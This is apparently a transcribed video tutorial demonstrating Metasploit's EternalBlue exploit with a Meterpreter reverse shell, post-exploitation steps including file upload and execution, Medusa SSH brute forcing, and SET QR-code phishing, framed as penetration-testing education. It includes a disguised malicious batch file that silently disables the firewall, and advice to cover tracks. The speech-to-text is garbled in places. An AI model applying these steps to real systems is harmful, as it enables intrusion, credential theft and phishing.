Everyone, welcome to my channel. My name is Soundarya Dureraj. I'm currently pursuing an MTech in cybersecurity. I'm thrilled to have you here as we kick off this journey into a fascinating world of cybersecurity. We are going to explore cybersecurity tools like meta exploit, Medusa, and QR code attack. We are going to dive deep into some powerful tools that cybersecurity professionals use for penetration testing. One is meta exploit, another one is meta predator. We explore their capabilities, how they can enhance their security assessment, and also how they can be used for offensive and defensive strategies. So let's get started. First up, let's talk about meta-exploit. This open source framework is a comprehensive suite of tools and the modules for the penetration testing and the vulnerability assessment. It has a vast library of exploits, payloads, auxiliary modules designed to test the vulnerabilities across various operating systems and applications. Meta exploits allow the penetration testers to discover vulnerabilities, exploit them, and gain the access to the target system. You can use it for tasks like exploiting remote system, escalating privileges, and also performing post exploitation actions. The real power of meta exploits lie in its ability to exploit weakness in the system and help to identify those vulnerabilities before the attackers can take the advantage of them. Now let's move on to the Metapred, which is an advanced payload within a Meta-exploit. Metapred is a powerful tool that provides a remote control of compromised systems. It is like Swiss Army knife for penetration testers, giving you a command line interface to interact with control of target system. Metapred, you can execute commands, manipulate files, gathering system informations, even escalate privileges. It is an incredible tool that allows for tasks like keylogging, injecting code into the processes, and launching attacks from within a compromised system. The key advantage of Metapred is that process entirely in the memory and leaving minimal trace on the compromised system, which make it harder to detect. Perform these tasks, we typically use Kali Linux, the Debian-based Linux distribution OS designed specifically for penetration testing. Kali comes with preloaded with a wide range of security tools, including Meta-exploit, Nmap, Wireshark, and many more. Kali Linux is a go-to OS for security professionals and it backed by the large active community that contributes to its development and provide constant support. Launching Meta-exploit and Metapredator on Kali Linux. Now let's walk through how can we launch Meta-exploit Metapredator on Kali Linux. Here you need to do open the terminal in the Kali Linux. Type msf console to the start Meta-exploit console. Use the command use command to select the exploit module like use exploit slash windows slash smb slash ms 17 underscore 010 underscore eternal blue. Set the target IP address and the payload using the set command. Execute exploit Execute the exploit using the run command. Once the exploit is successful, Metapredator session was established. You will be able to interact with the compromised system remotely. Blue, a dangerous vulnerability. Let's also take a moment to talk about EternalBlue, a critical vulnerability in Microsoft Windows that was exploited by the WannaCry ransomware attack and other cyber attacks. Metapredator capabilities and the post exploitation. With the Metapredator, you can perform wide range of exploit activities. System information. Use the system info command to gather the detailed system informations like OS version, installed softwares. Network enumeration using the commands like netstat and route to gather the information about the active network connections and even routing tables. Privilege escalation. You can use the commands like get UIID to determine the user ID and the tools like get system and migrate to attend the privilege escalations. These commands are invaluable when you're trying to gain deeper access to the system and pivot across the networks. The blue vulnerability was initially developed by NSA for undercover purpose, but it is later leaked by the hacking group Shadow Brokers, make it accessible to the attackers worldwide. The EternalBlue was used in several high-profile cyber attacks, including WannaCry, NotPetya, causing billions of dollars in damage worldwide. This leak provides the attackers with powerful tool lead to spread disruption. Now let's break down how EternalBlue works. Exploits a flaw in SMB version 1, which is an world protocol used for file sharing and network communications. By exploiting this flaw, the attackers can execute remote code on a vulnerable machine without requiring any user interaction. Once a metaperator session is established, it's time to explore manipulate the compromised system. You can use the metaperator commands to investigate system, gather data, and escalate privileges. However, it is an essential to mind cover your tracks and leaving your no trace behind. Executing payloads and exploring the target system, we need file manipulation, process manipulation, and a key logging. That's a wrap of the overview. Now let's jump into a live demo of meta exploit in the actions. I will show you how to set up an exploit and then interact with a compromised system using Metapretr. Stay tuned. Let's dive into it. I will demonstrate the eternal blue exploit using Metasploit. For this, the target system initially has its firewall enabled. However, through the social engineering techniques, we bypass the defense mechanism. Here the scenario, we crafted the malicious bat file and send it to the target. The user pursued to the download this file under the pretense that the utility for fixing and enhancing the file explorer. Once the victim downloads and double click on the bat file, the system prompts for administrative privileges. Through this user access control prompt, the victim unknowingly provides the necessary permission. Upon the execution of .bat file, displaying the fake message in the command prompt stating initializing the file explorer, process 1 starting, file explorer, process 2, file explorer is installed to avoid suspicion. Meanwhile, in the background, it silently disabled the system firewall and paving the will walk you through the process of identifying and exploiting the vulnerabilities in the Windows 7 OS, specifically targeting the SMB protocol using the Eternal Blue exploit. Identify the target. To begin, we are working on the Windows 7 system where the SMB protocol known to be vulnerable to the exploitation. The first task is to identify the target IP address. For this, we using ifconfig command user to gather the network configuration details including target IP address and the subnet. So I'm entering the IP config. Here I get the 172.19.20.13. In the subnet help us to focus our scanning process effectively. Scanning for open ports. We can use Nmap tool for network discovery using the command nmap-t4 a version IP address slash 24 T4 specifying the timing template for faster scanning. A enables the OS detection, version detection, script scanning, and trace route.
-v enables the verbose output for detailed informations. The scan reveals the open ports on the system in the subnet. Among the open ports, we are particularly interested in port 445, which is commonly associated with SMB protocol. Many systems we have this port open, but we select one target IP address and save it for later. Here we see the discovery opened port of 445. A stealthy scan gives you many more open ports with the IP address. Here 135.3306.445 open ports are there. Copy and paste it in text editor for selection of single target. So I have chosen the open port 445 TCP on 172.19.23.10, launching the meta exploit framework. With the target IP address identified, we proceed to exploit using the meta exploit framework. In the command prompt msf console, after a brief initialization, the framework will load. You will see the MSF prompt. This indicates the system is ready for exploitation. SMB, the server message block, is a protocol that allows to share the access to files, printers, and other network resources. It's widely used in Windows environment. However, it is an improper configurations and the vulnerabilities can make it potential attack vector. EternalBlue. EternalBlue is a powerful exploit that targets a vulnerability MS17 010 in the SMB protocol. This vulnerability allows an attacker to execute attribute code on a target system without authentication. It was leaked by the hacking group and has since been used in the major attacks like WannaCry and NotPetya ransomware. We have two 437 exploits, 1255 auxiliaries, 1471 payloads. Here, selecting the exploits, in the MS prompt, type the following command: load the eternal blue exploit module, use exploit slash windows slash smb slash ms17 underscore 010 underscore eternal blue. No payload configure. Default to the Windows. So we require to set up the options and the payload. Let me configure by step. Payload selection. Set payload Windows slash x64 Metapreter slash reverse TP. Then we need to set the L host and L port. L host, this is the local host IP address and set with ms17 underscore 010 underscore eternal blue. No payload is configured. So we need to set up options and payload. Let's configure these step by step. Here it is default to Windows slash x64 Metapreter slash reverse TP. Set payload Windows x64 slash Metapreter slash reverse underscore TCP. Next, setting the L host and L port. Once the reverse TCP payload is done, we need to setting the L host and L port. Set L host in the cats, give the IP address of ours. So this is the local host IP address of our machine. Once the L host is done, we need to give set L port. L port have a default port number 444. We also give some other port numbers 5, 6, 1, 2. Once L port is set, we can able to give set our host. We need that our host IP address we already stored in the text editor with 172.19.23.10. Now, starting the exploit. With the everything configured, type the following begin the attack exploit. Meta exploit will attempt to exploit the vulnerability, establish the session, gives you the control over the target system. Once the session is active, you can use Metapreter shell for post exploitation activities such as gathering information and escalating privileges. Once the exploit is successful, meta exploit establishes a session with target system. This is where we transaction to use the metapreter's shell for interaction. At meta exploit format type session -i one. Session 1 is already interactive, so we go for gathering the system information. One of the first action you should perform is verify the detail of compromised system. To do this, use the following command sysinfo. This will display the details about targeting system including its operating system, architecture, host name. This step will confirm the environment you worked in. Now we need to get more about user information. User information to identify the currently logged in user. This will return the user ID and the username of active session. This information is valuable for determining the level of access you have on the system. Next, capturing a screenshot. To further demonstrate control over the target system, you can able to take a screenshot of target desktop. The command is screenshot. This action captures a snapshot of the current screen on the compromised system and save it in local machine in the root folder. The screenshot will be available in file system. Click on the file system. We need to navigate to root. Root is a protected directory, so we need to open as root. Once you open as a root, we need to give a password and click on authenticate. We can able to see the screenshot of target machine guide you through uploading a file to a target machine using Kali Linux. Let's break out down into few simple steps. We need to ensure we have access to target machine. Through the process of uploading a file to a target machine using the upload command in the Metasploit Metapreter shell. Let's ensure the access between the target system and the Kali Linux. If you are not already in the Metapreter session, use the exploit module and payload in Metapreter to establish one. Once the Metapreter session is alive, we can able to upload the file. In the Metapreter session, navigate to the desired directory on the target machine where you want to place the file. Now, upload local file path and remote file path. Once it is completed, we need to execute because which was an a batch file I have sent. Execute -f that file path. Process 1228 is completed. Here you can able to see the RU hacked batch file is placed. Here run as an administrator. Once you run as an administrator, we can able to see various processes get started. For example, calculator, notepad, many process get started. This method is fast, efficient, and ideal for transferring payloads, scripts, or other tools to compromise machines. Additionally, Metapreter provides the encryption for its sessions and helping bypass the network monitoring. This process is strictly for ethical hacking or penetration testing within legal and authorized environment.
We just completed our demo on Meta exploit. Now we go for a powerful tool for penetration testing. Now let's shift your gears and explore another essential tool for Kali Linux, Medusa, a powerful brute force password cracking tool. What is Medusa? Medusa is a versatile open source tool designed for testing the security of the network service. By performing brute force attacks, it's widely used in the penetration testing to assess the password strength across various protocols. One of the greatest thing about Medusa is open source. Now it's only free to use, but also provides then a security professional and the developers can also modify the source code to meet their unique requirements. Medusa comes packed with the features that make it go-to tool for ethical hackers. First, simultaneous attacks. Medusa can perform parallel attacks, make it incredible fast and efficient. Next, multiple protocols. It supports various soft network services including FTP, SSH, Telnet, MySQL, so we can test different services in a one tool. Finally, the wordless support. Medusa allows the use of custom word lists tailored to the specific targets, making brute force process more effective. Installation Medusa on the Kali Linux. Medusa is an pre-installed in Kali Linux, so no extra step is used needed. For example, we need to give sudo apt-get install Medusa. This will download and install Medusa along with any dependency. So we ready to go. Using Medusa for brute force attacks, let's break down the process of Medusa for brute force attack in three steps. First, target selection. Second, word list loading. Third, command execution. Target selection is in like identify the target service like SSH FTP. The next one is word list loading. Choose the word list contains more common password and customize entry to specific its target. Command execution run the Medusa attack with the protocol target username word list to begin this attack. Basic syntax of Medusa is follows like Medusa options hyphen h target hyphen u username hyphen p word list. Hyphen h specifies the target IP address. For example, we need to give Medusa hyphen h 192.168.1.100 hyphen u admin hyphen p path to the password text and hyphen m ssh. With some modules and target services, we have like SSH module, FTP module, and Telnet module. Now, let's move into the demo portion of this session. We are going to demonstrate how Medusa can be used to perform brute force attack against the SSH service.
I will demonstrate how to use Medusa, a powerful and fast tool for performing brute force attacks on the login services. Medusa is a tool used in the penetration testing specifically for testing the strength of authentication mechanism on service like SSH, FTP, HTTP, and more. It is designed to perform brute force attack on the login credentials to identify weak or default passwords, which are common vulnerabilities. The penetration tester can use the Medusa to demonstrate vulnerabilities and provide the recommendations such as implementing strong password policies and multi-factor authentication. Preparing the environment. Login in as root. First, we log in as root user since the administrative privileges are required to install or use the tools like Medusa. Open the terminal and type apt install Medusa. Medusa is pre-installed in Kali Linux, but if it is missing, we install it. In our case, I think it's already installed. Can we go for next step? Creating the password and user list, which contains list of potential password. In application we need to search as text editor. Once the text editor open, it will give a mousepad text editor from the application. Enter a list of possible password, one per line, like this: admin, admin at 123, password QWERTY 1234. Let me in. Tommy as a pet name, Kali, and Kali at 123. And Red Fox to save the file as password list, which contains predefined list of username and password to attempt authentication, which is also used for password cracking. We called this as dictionary attack. We need to save as text file and click on save. Once we click on the save, we need to move for third step. Identify the target. Find the target IP address. Here, I need to find my IP address before going to find the target IP address. So, using the command ifconfig to determine my own machine IP address, the target machine must be in same network. Here, I'm going to use the Angry IP scanner. Angry IP scanner is a cross-platform network scanner designed to quickly scan the IP address and the ports to identify the active device and open service on the network. I need to give IP range 172.20.1.0 into range 172.20.1.200. Click on start button and it will start to scan the network. Wait for all the threads to terminate. The scanning is completed. Once we click on close, sort by open ports, looking for the machine with port 22 open, which indicate the active SSH service. Click on sort by ports, which give the 172.20.1.90, which the port 22 is open. Nmap, a powerful tool used for network discovery, security auditing, vulnerability assessment through detailed scanning of host ports and services, rechecking the open ports with Nmap. To confirm, use the nmap command nmap-p 22.172.20.1.90. Here you see 22 port is open, typically using the SH. Using the Medusa to attack. Now that we have a target IP and known port 22 is open, we can proceed with Medusa. The syntax for the Medusa command is Medusa-h 172.20.1.90 -u, username as an red fox -p. The password path is slash home slash collie slash desktop slash password underscore list hyphen m ssh hyphen f. Let's break down. Hyphen h specify the target IP address. Hyphen u specify the single username. Alternatively, you can provide the user list with hyphen u. Hyphen p specify the path of the password list. Hyphen small p give the single password. Hyphen m defines the service to attack. In this case, we are using SSH. Even we can use SMB HTTP. Hyphen f stops the attack after the first successful login. Medusa will start the process. Medusa will attempt to log into the target machine using the combination of specified username and the password from the list. As an first step, the user as Red Fox and the password admin try to attempt the login to target machine. If it is failed, it will check for next password in the password list. Red Fox admin at 123 and it goes on. If it is successful, the result will shown in the valid credentials. Account found the host 172.20.1.90, the user redfox, and the password Kali. Acknowledgement as a success. In addition to brute force, the Medusa can also performing password spraying, where the same password is tested across multiple username. This avoids the locking out accounts due to multiple failed attempts of single username. Remember that tools like Medusa should only be used ethically and legally on the system. You have a explicit permission to test. Brute force attacks can expose weak password, empathizing the importance of using strong and unique credentials. Thank you for listening to this demo. We can proceed with social engineering attack.
Social engineering with set toolkit, understanding and defending against the psychological attacks. Hello everyone, welcome to another session of cybersecurity. Today we are diving into the social engineering attacks and learning how tools like set toolkit can help us to understand these attacks and defend against them. Social engineering is all about manipulating human behavior to gain access to sensitive information or system. With this attack becoming more sophisticated, understanding the techniques used by the attackers is critically for building effective defense. Let's start with SET toolkit, also known as a social engineering toolkit. It is an open source penetration testing framework designed especially for the social engineering attacks. SET toolkit is written in Python and works in most of the Linux distributions. Its capabilities, including phishing, credential harvesting, even creating the malicious QR code. It is a powerful tool for understanding how the social engineering works, for training the teams to recognize these type of attacks. Understanding social engineering attacks. Social engineering attacks typically relies on three main tactics: deception, trust, urgency. Thus, use deceptive techniques to trick people into revealing their sensitive information. Trust by legitimate entities are creating realistic scenarios. Attacker exploits victim trust, urgency. Many attacks create a sense of urgency to pressure the victims into acting quickly without fully consider the consequence. These tactics makes the social engineering attacks effective and dangerous. Demonstration creating a malicious QR code. Now let's talk about one of the capabilities of set toolkit, creating a QR code. QR codes are convenient, but they can also exploit to the redirect users to phishing websites and deliver malware. Open a set toolkit and navigate to the module for generating malicious QR code. Specify the target URL or a malware payload you want to deliver. Set toolkit generates a QR that, when scanned, triggers and the malicious actions on the victim device. Attackers often use these codes in the public space, emails, even the fake advertisement to unsuspecting the victims.
In this demo, we are going to perform a QR code generated attack. First, open a terminal in the Kali Linux and log in as root. Once you log in as a root, you need to type set toolkit to launch the social engineering toolkit. Once you hit the enter, you will see a menu of attack options. From that list, we need to select option 1, social engineering attacks. Now you will see another menu. Select option 8, the QR code generator attack vector. Now this allows us to generate a QR code linked to any URL. Now set will ask you enter the URL. For this demo we will use Instagram login page. Once you hit enter, set will generate a QR code. Save it in default folder. QR code will save in the .set directory under the reports folder. Under the root folder. To access it, navigate to root folder. Once you click on the home icon, you enter into the file explorer. Then you need to select a file system. Once you click on the file system, you see the root. Since it is in a protected directory, you need a root permission. So, right click on the root folder, select the option open as root. It will enter into the root directory. We able to see the path. Give dot set. You see the report folder. Once you go to the report folder, you see the QR code attack PNG. Copy that and paste it in file system. If you copy and paste it in the file system, you can able to see in file system. Once the QR attack PNG is available in the file system, just copy and go to the desktop. Click on the desktop icon and paste it. Once it's done, go to the Firefox browser. Now let's test the QR code. Search for any online QR code scanner or many tools are available for that uploading an image of QR code. We go for QR code scanner. Code scanner, you see the bottom, the image icon. Use the file explorer to upload the QR code file from the desktop. Once scanned, you will see the result is the Instagram login URL you entered earlier. This demonstrates how the attackers might use your QR codes to direct unsuspecting users to phishing sites or malicious link. This method highlights the importance of verifying QR codes before scanning. QR codes are often assumed to be safe, but they can lead to the phishing pages or malicious content. Be cautious and always check the resource.
Thank you for watching. I hope you find this session on social engineering set toolkit is so informative. If you like this video, don't forget to subscribe for more cybersecurity content. Together, let's make a digital world safer place. See you in the next video. Thank you.